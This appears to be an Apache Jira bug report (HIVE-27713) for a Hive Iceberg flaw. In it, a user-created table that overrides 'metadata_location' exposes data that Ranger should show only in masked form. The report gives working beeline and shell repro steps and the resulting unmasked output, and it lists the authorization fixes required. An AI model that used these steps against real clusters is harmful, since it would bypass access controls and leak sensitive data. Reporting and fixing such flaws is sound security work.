Janos Kovacs created HIVE-27713:
-----------------------------------
Summary: Iceberg: metadata location overrides can cause data breach
Key: HIVE-27713
URL: https://issues.apache.org/jira/browse/HIVE-27713
Project: Hive
Issue Type: Bug
Components: Authorization, Iceberg integration
Affects Versions: 4.0.0-alpha-2
Reporter: Janos Kovacs
Assignee: Ayush Saxena
Set to bug/blocker instead of enhancement due to its security related nature,
Hive4 should not be released w/o fix for this. Please reset if needed.
Context:
* There are some core tables with sensitive data that users can only query
with data masking enforced (e.g. via Ranger). Let's assume this is the
`default.icebergsecured` table.
* An end-user can only access the masked form of the sensitive data as
expected...
* The users also have privilege to create new tables in their own sandbox
databases - let's assume this is the `default.trojanhorse` table for now.
* The user can create a malicious table that exposes the sensitive data
non-masked leading to a possible data breach.
* Hive runs with doAs=false to be able to enforce FGAC and prevent end-user
direct file-system access needs
Repro:
* First make sure the data is secured by the masking policy:
{noformat}
<kinit as privileged user>
beeline -e "
DROP TABLE IF EXISTS default.icebergsecured PURGE;
CREATE EXTERNAL TABLE default.icebergsecured (txt string, secret string) STORED
BY ICEBERG;
INSERT INTO default.icebergsecured VALUES ('You might be allowed to see
this.','You are NOT allowed to see this!');
"
<kinit as end user>
beeline -e "
SELECT * FROM default.icebergsecured;
"
+------------------------------------+--------------------------------+
| icebergsecured.txt | icebergsecured.secret |
+------------------------------------+--------------------------------+
| You might be allowed to see this. | MASKED BY RANGER FOR SECURITY |
+------------------------------------+--------------------------------+
{noformat}
* Now let the user to create the malicious table exposing the sensitive data:
{noformat}
<kinit as end user>
SECURED_META_LOCATION=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal"
beeline -e "DESCRIBE FORMATTED default.icebergsecured;" 2>/dev/null |grep
metadata_location |grep -v previous_metadata_location | awk '{print $5}')
beeline -e "
DROP TABLE IF EXISTS default.trojanhorse;
CREATE EXTERNAL TABLE default.trojanhorse (txt string, secret string) STORED BY
ICEBERG
TBLPROPERTIES (
'metadata_location'='${SECURED_META_LOCATION}');
SELECT * FROM default.trojanhorse;
"
+------------------------------------+-----------------------------------+
| trojanhorse.txt | trojanhorse.secret |
+------------------------------------+-----------------------------------+
| You might be allowed to see this. | You are not allowed to see this! |
+------------------------------------+-----------------------------------+
{noformat}
Currently - after HIVE-26707 - the rwstorage authorization only has either the
dummy path or the explicit path set for uri:
{noformat}
Permission denied: user [oozie] does not have [RWSTORAGE] privilege on
[iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ftrojanhorse%2Fmetadata%2Fdummy.metadata.json]
Permission denied: user [oozie] does not have [RWSTORAGE] privilege on
[iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ficebergsecured%2Fmetadata%2F00001-f4c2a428-30ce-4afd-82ff-d46ecbf02244.metadata.json]
{noformat}
With custom location it's even not passed to the authorizer:
{noformat}
2023-05-17 19:38:51,867 INFO org.apache.hadoop.hive.ql.Driver:
[a49356b4-1b7a-4c9d-9b70-81af12c0465f HiveServer2-Handler-Pool: Thread-253]:
Compiling
command(queryId=hive_20230517193851_8b9f0ad7-2ae1-4078-b76a-e51c31321b0b):
CREATE EXTERNAL TABLE default.policytestth (txt string, secret string) STORED
BY ICEBERG
TBLPROPERTIES (
'metadata_location'='hdfs://test.local.host:8020/warehouse/tablespace/external/hive/policytest/metadata/00001-a3e46c1b-318b-4b46-886a-c6ea591f63c1.metadata.json')
...
2023-05-17 19:38:51,898 DEBUG
org.apache.iceberg.mr.hive.HiveIcebergStorageHandler:
[a49356b4-1b7a-4c9d-9b70-81af12c0465f HiveServer2-Handler-Pool: Thread-253]:
Iceberg storage handler authorization URI
iceberg://default/policytestth?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Fpolicytestth%2Fmetadata%2Fdummy.metadata.json
{noformat}
Mandatory changes required for securing tables:
* Custom location needs to be passed to the Authorizer
Changes required for usability - e.g. to eliminate the need to require a policy
for each tables:
* Default location needs to be calculated based on warehouse/database def.
location
* CREATE/ALTER with default locations should not involve RWStorage
Authorization or should be handled a special way in the Authorizer.
--
This message was sent by Atlassian Jira
(v8.20.10#820010)